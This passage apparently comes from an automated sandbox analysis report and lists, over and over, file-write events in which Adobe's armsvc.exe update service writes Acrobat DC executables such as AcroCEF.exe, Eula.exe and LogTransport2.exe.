Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
